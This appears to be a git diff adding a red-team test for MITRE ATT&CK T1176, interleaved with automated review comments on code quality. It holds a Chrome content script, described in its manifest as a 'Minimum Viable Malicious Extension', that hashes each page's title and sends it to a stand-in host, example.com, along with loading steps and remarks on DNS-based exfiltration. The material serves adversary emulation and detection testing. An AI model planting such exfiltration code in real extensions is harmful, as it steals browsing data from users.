diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..a8b5f435
--- /dev/null
+++ b/Mac/Collection/Browser_Extensions.md
@@ -0,0 +1,10 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
+Then click 'Select'
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/manifest.json
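Review bot: The promise returned by `exfil` resolves with the digest whether or not the request was ever issued, because `callUrl` returns right after `xmlHttp.send( null)` with no load or error handler attached, so a blocked, failed, or CSP-refused request looks identical to a successful one to anyone reading the value; the comment above `callUrl` should state that, e.g. `// fire-and-forget: the returned digest says nothing about whether the request left the browser`. In `hex`, `var athing = hexCodes.join("");` is dead code (the next line recomputes the same join), so drop it and keep `return hexCodes.join("");`. The `"utf-8"` argument to `TextEncoder` is ignored by the constructor, so `new TextEncoder()` is equivalent and avoids implying other encodings are supported. The last line stores a Promise under the name `digest`, which is misleading next to the `digest` string inside `callUrl`; `var pendingDigest = exfil(document.title);` or a comment `// resolves to the hex digest after the request has been issued` would match what it actually holds.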
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
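Review bot: `"matches": [ "" ]` hands the content script an empty match pattern, which Chrome rejects at load time as an invalid value for `content_scripts[0].matches[0]`, so the extension as committed should fail to install from `chrome://extensions` and `inline.js` would never run. The diff is rendered as HTML, so the intended value may have been an angle-bracketed pattern that was stripped in rendering; confirm the file in the working tree and make sure the committed value is what the loading steps in Browser_Extensions.md expect. `"manifest_version": 2` is on Chrome's deprecation track, so the same steps may stop working on current browser builds; since JSON has no comment syntax, a line in Browser_Extensions.md naming the Chrome version this test was last verified against would save the next person a debugging session.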